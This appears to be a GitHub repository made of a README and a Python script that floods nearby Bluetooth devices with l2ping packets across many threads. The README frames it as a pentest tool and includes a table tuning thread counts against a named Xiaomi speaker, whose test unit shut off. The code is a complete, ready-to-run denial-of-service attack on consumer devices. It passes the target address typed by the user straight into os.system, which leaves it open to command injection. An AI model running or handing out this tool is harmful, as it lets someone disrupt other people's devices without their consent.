├── README.md └── Bluetooth-DOS-Attack.py /README.md: -------------------------------------------------------------------------------- 1 | # Bluetooth DOS-Attack Script 2 | 3 | ![Python Version](https://img.shields.io/pypi/pyversions/Django.svg) 4 | 5 | Script for conducting DOS-attacks on Bluetooth devices for pentest purposes. 6 | 7 | ## Disclaimer 8 | 9 | This project was created for educational purposes and personal use only. 10 | 11 | **DISCLAIMER:** This software is provided "as is" without any warranty. Usage is at your own risk. The developers assume no liability for any misuse or damage caused by this program. 12 | 13 | ## Installation 14 | 15 | ```shell 16 | $ sudo apt update 17 | $ sudo apt install python3 18 | $ sudo git clone https://github.com/jieggiI/BLUETOOTH-DOS-ATTACK-SCRIPT.git 19 | $ cd BLUETOOTH-DOS-ATTACK-SCRIPT/ 20 | $ python3 Bluetooth-DOS-Attack.py 21 | ``` 22 | 23 | ## Note 24 | 25 | This script is designed to work only on Linux systems.You must have "l2ping" and "hcitool" utilities on your Linux machine (they are installed by default on Kali Linux). 26 | 27 | ## Tested on 28 | 29 | Kali Linux as attacker, and Xiaomi Portable Bluetooth Speaker as target, 30 | 31 | Raspberry Pi W Zero as attacker, and Redmi Buds Lite as target 32 | 33 | ## Manual 34 | 35 | Target ID or MAC: ID or MAC address displayed after scanning. 36 | 37 | Package Size: Size of the packages to be sent to the target (600 is optimal). 38 | 39 | Threads Count: Number of threads that simultaneously send packages to the target. Optimal value can be found in the provided table. 40 | 41 | | Packages size | Threads count| Ping, ms | Distance, meters | Time waited, sec | Device | 42 | |:--------------:|:-----: |:------------:|:--------------------:|:----------------:|:------:| 43 | | 600 | 1 | 9 |0,3 | 5 |Xiaomi Mi Portable Bluetooth Speaker| 44 | | 600 | 10 | 38 |0,3 | 5 |Xiaomi Mi Portable Bluetooth Speaker| 45 | | 600 | 20 | 78 |0,3 | 5 |Xiaomi Mi Portable Bluetooth Speaker| 46 | | 600 | 50 | 229 |0,3 | 5 |Xiaomi Mi Portable Bluetooth Speaker| 47 | | 600 | 100 | 413 |0,3 | 5 |Xiaomi Mi Portable Bluetooth Speaker| 48 | | 600 | 200 | 806 |0,3 | 5 |Xiaomi Mi Portable Bluetooth Speaker| 49 | | 600 | 500 | 1961 |0,3 | 5 |Xiaomi Mi Portable Bluetooth Speaker| 50 | | 600 | 1000 | 6621 |0,3 | 5 |Xiaomi Mi Portable Bluetooth Speaker| 51 | | 600 | 1000+ | Couldn't calculate |0,3 | 5 |Xiaomi Mi Portable Bluetooth Speaker| 52 | 53 | ## What Happens to the Target Device 54 | 55 | While I can't speak for all devices, the device I tested typically just turned off. 56 | -------------------------------------------------------------------------------- /Bluetooth-DOS-Attack.py: -------------------------------------------------------------------------------- 1 | import os 2 | import threading 3 | import time 4 | import subprocess 5 | def DOS(target_addr, packages_size): 6 | os.system('l2ping -i hci0 -s ' + str(packages_size) +' -f ' + target_addr) 7 | 8 | def printLogo(): 9 | print(' Bluetooth DOS Script ') 10 | def main(): 11 | printLogo() 12 | time.sleep(0.1) 13 | print('') 14 | print('\x1b[31mTHIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM.') 15 | if (input("Do you agree? (y/n) > ") in ['y', 'Y']): 16 | time.sleep(0.1) 17 | os.system('clear') 18 | printLogo() 19 | print('') 20 | print("Scanning ...") 21 | output = subprocess.check_output("hcitool scan", shell=True, stderr=subprocess.STDOUT, text=True) 22 | lines = output.splitlines() 23 | id = 0 24 | del lines[0] 25 | array = [] 26 | print("|id | mac_addres | device_name|") 27 | for line in lines: 28 | info = line.split() 29 | mac = info[0] 30 | array.append(mac) 31 | print(f"|{id} | {mac} | {''.join(info[1:])}|") 32 | id = id + 1 33 | target_id = input('Target id or mac > ') 34 | try: 35 | target_addr = array[int(target_id)] 36 | except: 37 | target_addr = target_id 38 | 39 | 40 | if len(target_addr) < 1: 41 | print('[!] ERROR: Target addr is missing') 42 | exit(0) 43 | 44 | try: 45 | packages_size = int(input('Packages size > ')) 46 | except: 47 | print('[!] ERROR: Packages size must be an integer') 48 | exit(0) 49 | try: 50 | threads_count = int(input('Threads count > ')) 51 | except: 52 | print('[!] ERROR: Threads count must be an integer') 53 | exit(0) 54 | print('') 55 | os.system('clear') 56 | 57 | print("\x1b[31m[*] Starting DOS attack in 3 seconds...") 58 | 59 | for i in range(0, 3): 60 | print('[*] ' + str(3 - i)) 61 | time.sleep(1) 62 | os.system('clear') 63 | print('[*] Building threads...\n') 64 | 65 | for i in range(0, threads_count): 66 | print('[*] Built thread №' + str(i + 1)) 67 | threading.Thread(target=DOS, args=[str(target_addr), str(packages_size)]).start() 68 | 69 | print('[*] Built all threads...') 70 | print('[*] Starting...') 71 | else: 72 | print('Bip bip') 73 | exit(0) 74 | 75 | if __name__ == '__main__': 76 | try: 77 | os.system('clear') 78 | main() 79 | except KeyboardInterrupt: 80 | time.sleep(0.1) 81 | print('\n[*] Aborted') 82 | exit(0) 83 | except Exception as e: 84 | time.sleep(0.1) 85 | print('[!] ERROR: ' + str(e)) 86 | --------------------------------------------------------------------------------